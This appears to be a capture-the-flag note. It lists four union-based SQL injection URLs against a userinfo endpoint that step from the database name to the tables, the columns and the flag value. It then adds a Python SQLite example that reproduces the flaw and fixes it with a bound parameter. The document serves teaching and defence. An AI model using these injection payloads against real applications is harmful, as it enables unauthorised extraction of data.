http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,(database())---database name
http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()---table names
http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,(group_concat(column_name)) from information_schema.columns where table_name="flag"---column names
http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,(select flag from flag)---value
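
Why these requests work, and the fix, as an added example that is not part of the original notes: the id value is concatenated into the query text, so everything after "1" is parsed as SQL. Assumptions: an in-memory SQLite database stands in for the target's backend, and the users table, its columns, the flag value and the function names are constructed for illustration; only the three-column result and the flag table/column come from the notes.

```python
import sqlite3

# Constructed stand-in for the target: the notes show a three-column result and
# a table "flag" with column "flag"; everything else here is assumed.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT);
        INSERT INTO users VALUES (1, 'alice', 'alice@example.test');
        CREATE TABLE flag (flag TEXT);
        INSERT INTO flag VALUES ('flag{constructed-sample}');
    """)
    return db

def userinfo_vulnerable(db, raw_id):
    # The id parameter is pasted into the SQL text, so it is parsed as SQL.
    sql = "SELECT id, name, email FROM users WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def userinfo_hardened(db, raw_id):
    # 1) Strict type check: id must be an ASCII decimal integer, nothing else.
    if not raw_id.isascii() or not raw_id.isdigit():
        raise ValueError("id must be a positive integer")
    # 2) Bound parameter: the value never becomes part of the SQL text.
    return db.execute(
        "SELECT id, name, email FROM users WHERE id = ?", (int(raw_id),)
    ).fetchall()

# Query-string value of the fourth request in the notes.
PAYLOAD = "1 and 1=2 union select 1,2,(select flag from flag)"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", userinfo_vulnerable(db, PAYLOAD))
    try:
        userinfo_hardened(db, PAYLOAD)
    except ValueError as exc:
        print("hardened rejects payload:", exc)
    print("hardened, id=1:", userinfo_hardened(db, "1"))
```

The bound parameter is the actual fix; the integer check is defence in depth and gives a clean 400-style rejection point to log and alert on.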